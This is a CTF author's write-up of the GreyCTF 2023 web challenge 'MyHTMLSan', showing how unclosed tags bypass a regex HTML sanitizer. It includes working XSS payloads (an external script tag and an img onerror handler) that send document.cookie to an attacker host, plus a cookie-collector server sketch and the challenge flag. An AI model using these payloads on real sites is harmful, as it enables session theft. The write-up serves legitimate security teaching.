
GreyCTF 2023 Finals: MyHTMLSan


This is the author’s writeup for the challenge MyHTMLSan in the web category.

It describes the solution I intended when I made the challenge.

Challenge description

LiveOverflow inspired me to host html files, I hope I made them safe enough.

  • Junhua

There was no source code for this challenge, only a link to the website.

My Notes

Notes to future self when setting up this challenge

  • Spend more time checking for unexpected solutions

The Website

myHTMLService Main Page
When we first visit the website, we are greeted by a simple page with a form where users can submit their HTML code. We also see an embedded LiveOverflow video explaining the HTML specification.

After Submission
After submitting our HTML code, we are taken to a page that shows the rendered output of our HTML code (if any). There is also a "Report to admin" button that we can use to report this link to the admin.

Each submission is stored at a URL containing a UUID, which prevents users from guessing the location of other submissions.
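No source code was given during the challenge, so this is only a rough illustration. It assumes a Node.js backend and a hypothetical `/submission/` route, and builds an unguessable location from a random version 4 UUID, which carries 122 random bits:

```javascript
const { randomUUID } = require("crypto");

// Hypothetical route prefix; the real challenge's URL layout may differ.
const SUBMISSION_PREFIX = "/submission/";

// Builds the storage path for a new submission from a random (version 4) UUID.
function newSubmissionPath() {
  return SUBMISSION_PREFIX + randomUUID();
}

// Version 4 UUIDs look like xxxxxxxx-xxxx-4xxx-[89ab]xxx-xxxxxxxxxxxx (lowercase hex).
const UUID_V4 = /^[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/;

// Checks that a path has the expected prefix followed by a well-formed UUID.
function isSubmissionPath(path) {
  return (
    path.startsWith(SUBMISSION_PREFIX) &&
    UUID_V4.test(path.slice(SUBMISSION_PREFIX.length))
  );
}

console.log(newSubmissionPath());
```

Guessing one specific 122-bit value is infeasible. Other people's submissions can therefore only be reached through links they share, such as the one sent with "Report to admin".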

Looking at the question

As the image above shows, plain text is not sanitized by the page. Let us try some HTML tags.

After submitting <h1>test</h1>, we see the following output.

After submitting <h1>test</h1>

We can see that the h1 tags were stripped from the output.

To complete this challenge, we will have to find an XSS vulnerability in the website and get the admin to visit our submission (via the "Report to admin" button) to exploit it.

Finding the XSS vulnerability

Another hint that we have yet to look into is the LiveOverflow video embedded in the website. In the video, he talks about how he “discovered” an HTML sanitizer bypass that allowed him to inject JavaScript into a website, but eventually found out that it was just a quirk of the HTML specification.

He also specifically mentions that a < followed by a digit (i.e. [0-9]) does not start an HTML tag. The browser treats it as text and rewrites it as &lt;.
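This behaviour comes from the "tag open state" of the tokenizer in the HTML Living Standard. Below is a simplified sketch of that single step. It ignores the rest of the tokenizer, and the function name is made up for illustration. It shows why `<22` ends up as text while `<h1` starts a tag:

```javascript
// Simplified model of the HTML tokenizer's "tag open state": given the
// character right after a "<", report what the tokenizer does next.
function tagOpenAction(nextChar) {
  if (nextChar === undefined) return "text";            // EOF: "<" is emitted as text
  if (nextChar === "!") return "markup-declaration";    // <!-- ... --> or <!DOCTYPE
  if (nextChar === "/") return "end-tag";               // </tag>
  if (/^[A-Za-z]$/.test(nextChar)) return "start-tag";  // <h1, <script, <img
  if (nextChar === "?") return "bogus-comment";         // <?xml ...> becomes a comment
  return "text";                                        // anything else, e.g. a digit
}

for (const sample of ["<h1>", '<22 foo="bar">', "</p>", "<!--x-->"]) {
  console.log(sample, "->", tagOpenAction(sample[1]));
}
```

Because the `<` is emitted as a character, serializing the DOM afterwards (for example via `innerHTML`) writes it back out as `&lt;`.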

Let us try the example that he gave in the video, <22 foo="bar<h1>">test</22>.

After submitting new payload

We can see from the image that this too was stripped from the output.

Hmm… maybe there was something else in the video that hints at the answer for this question.

Towards the end of the video, he talks about how HTML cannot be parsed using regex. He then shows an example of a regex he found online that supposedly matches HTML tags.

Perhaps the sanitizer is built on a regex.

Regex from the video

The StackOverflow post that he mentions in the video is linked at the end of this post.

The main regex that was shown is <(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>. This regex is meant to match HTML tags. However, it has some issues.

It does not match a tag whose closing angle bracket > is missing (e.g. <br instead of <br> or <br />).
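We can reproduce the observations so far with a guess at how the sanitizer works: it deletes every match of the regex above. This is an assumption (the real implementation is in the MyHtmlSan source code linked at the end), but it explains all three results:

```javascript
// The tag-matching regex from the StackOverflow post, with the global flag.
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical sanitizer: remove everything the regex recognises as a tag.
function sanitize(html) {
  return html.replace(TAG_REGEX, "");
}

const samples = [
  "<h1>test</h1>",               // both tags match and are removed
  '<22 foo="bar<h1>">test</22>', // the quoted attribute lets one match span bar<h1>
  "<h1",                         // no closing ">", so nothing matches
];
for (const s of samples) {
  console.log(JSON.stringify(s), "=>", JSON.stringify(sanitize(s)));
}
```

The last sample is the key one. A tag without its `>` passes through untouched, and the browser's tokenizer is far more forgiving than the regex.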

Let us try it out on the website.

Unclosed h1 tag

For the above result, we submitted the payload <h1 without the closing >. As you can see from the rendered HTML, the h1 tag was not sanitized.

The solution

With that, we can use unclosed tags to inject our JavaScript payload. There are multiple possible solutions.

Script Payload

<script src="https://github.com/Jh123x/payload/raw/main/alert.js"

Script Payload

With the payload above, a script tag was rendered correctly on the page.

Chrome blocked the script

However, Chrome blocked the script from loading.

This is due to Chrome's Cross-Origin Read Blocking (CORB) feature. For more information, see the CORB link at the end of this post.

TLDR: Chrome blocks scripts from other domains that are not served with a JavaScript content type such as text/javascript.
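The TLDR rule can be written as a small predicate. This is a deliberately simplified model of the rule as stated above, not Chrome's actual CORB or MIME-checking logic. The set of JavaScript MIME types is only a subset of those recognised by the WHATWG MIME Sniffing standard:

```javascript
// Subset of the JavaScript MIME type essences listed in the WHATWG MIME Sniffing standard.
const JS_MIME_TYPES = new Set([
  "text/javascript",
  "application/javascript",
  "application/x-javascript",
  "text/ecmascript",
  "application/ecmascript",
]);

// Returns the "essence" of a Content-Type header: type/subtype, lowercased,
// with parameters such as "; charset=utf-8" dropped.
function mimeEssence(contentType) {
  return contentType.split(";")[0].trim().toLowerCase();
}

// Simplified model: a cross-origin <script> only runs if its response
// is served with a JavaScript MIME type.
function scriptWouldLoad(contentType) {
  return JS_MIME_TYPES.has(mimeEssence(contentType));
}

console.log(scriptWouldLoad("text/plain; charset=utf-8"));      // a plain-text response
console.log(scriptWouldLoad("text/javascript; charset=utf-8")); // an edited webhook.site response
```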

Thus, to make it work, we need a URL whose response we control, which a tool like webhook.site provides.

Editing page content to be text/javascript with an alert script

Here we can edit the response (its content and content type) returned when someone visits our webhook URL.

<script src="https://webhook.site/7ee53c33-a346-45da-8183-99142b31efcd"

With the above payload, we should be able to load any JavaScript that we want.

Successful alert
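webhook.site is just a convenient way to get an attacker-controlled URL. If you would rather host the script yourself, here is a minimal Node.js sketch of the same idea. The payload string and port are placeholders; the important detail is the `Content-Type` header:

```javascript
const http = require("http");

// Placeholder payload: replace with the JavaScript you want the admin's browser to run.
const PAYLOAD = "alert(document.domain);";

// Answers every request with the payload and a JavaScript MIME type,
// which is what lets the browser execute it as a cross-origin script.
function handler(req, res) {
  res.writeHead(200, { "Content-Type": "text/javascript; charset=utf-8" });
  res.end(PAYLOAD);
}

// Starts the server on the given port and returns it (call server.close() to stop).
function startServer(port) {
  return http.createServer(handler).listen(port);
}
```

Calling `startServer(8000)` and pointing the payload at that host (for example a hypothetical `<script src="https://your-host/"`) behaves like the webhook.site URL, provided the admin's browser can reach it. If the challenge page is served over HTTPS, the script must be served over HTTPS too, or the browser will block it as mixed content.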

Now that we can trigger an alert, we can change the script to redirect the visitor to our own site along with their cookies, then report the page to the admin to get the flag.

document.location.href = "<your site here>?cookie=" + encodeURIComponent(document.cookie);

When the admin visits the page, their browser is redirected to our site with their cookie in the query string, which we can read to retrieve the flag.
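On the receiving end, we only need to read the `cookie` query parameter from incoming requests (webhook.site simply shows it in its request log). Here is a minimal Node.js sketch, assuming the parameter name used in the redirect above:

```javascript
const http = require("http");

// Pulls the exfiltrated cookie out of a request URL such as "/?cookie=flag%3D...".
// Returns null when the parameter is absent.
function extractCookie(requestUrl) {
  // A base URL is needed only because req.url is a relative path.
  const url = new URL(requestUrl, "http://localhost");
  return url.searchParams.get("cookie"); // percent-decoding is done here
}

// Logs every cookie that arrives; returns the listening server.
function startCollector(port) {
  return http
    .createServer((req, res) => {
      const cookie = extractCookie(req.url);
      if (cookie !== null) console.log("got cookie:", cookie);
      res.end("ok");
    })
    .listen(port);
}
```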

Img Payload

There is also an alternative that uses the img tag:

<img src="aa" onerror="document.location.href='<site here>?cookie='+encodeURIComponent(document.cookie)"

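This has the same effect as the script tag above. It is also faster, since the browser does not have to fetch an external script, and it needs no webhook.site setup for the script itself.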
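The whole trick relies on the payload never containing a `>`, so it is worth checking a filled-in payload against the regex before submitting it. The sketch below assumes the sanitizer deletes regex matches. `https://attacker.example/` is a placeholder for your own endpoint, and `buildImgPayload` is a hypothetical helper:

```javascript
const TAG_REGEX = /<(?:"[^"]*"['"]*|'[^']*'['"]*|[^'">])+>/g;

// Hypothetical helper: builds the unclosed <img> payload for a given exfiltration endpoint.
function buildImgPayload(exfilBase) {
  const js = `document.location.href='${exfilBase}?cookie='+encodeURIComponent(document.cookie)`;
  return `<img src="aa" onerror="${js}"`;
}

// True if the assumed regex-stripping sanitizer would leave the payload unchanged.
function survivesSanitizer(payload) {
  return payload.replace(TAG_REGEX, "") === payload;
}

const payload = buildImgPayload("https://attacker.example/");
console.log(payload);
console.log(survivesSanitizer(payload));
```

Note that the literal `<site here>` placeholder would itself be matched and stripped by the regex, which is another reason to fill in a real URL before testing.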

Flag

Flag: grey{r3geX_1s_N0t_4_htm1_cee664daa169f7cdb53f87ab810ccb15}

  1. LiveOverflow’s video on the HTML specification, to learn about parsing HTML with regex
  2. Webhook.site, for an attacker-controlled server to collect cookies
  3. CORB, to learn why Chrome blocks the script from loading
  4. MyHtmlSan source code
  5. StackOverflow post on why you should not use regex on HTML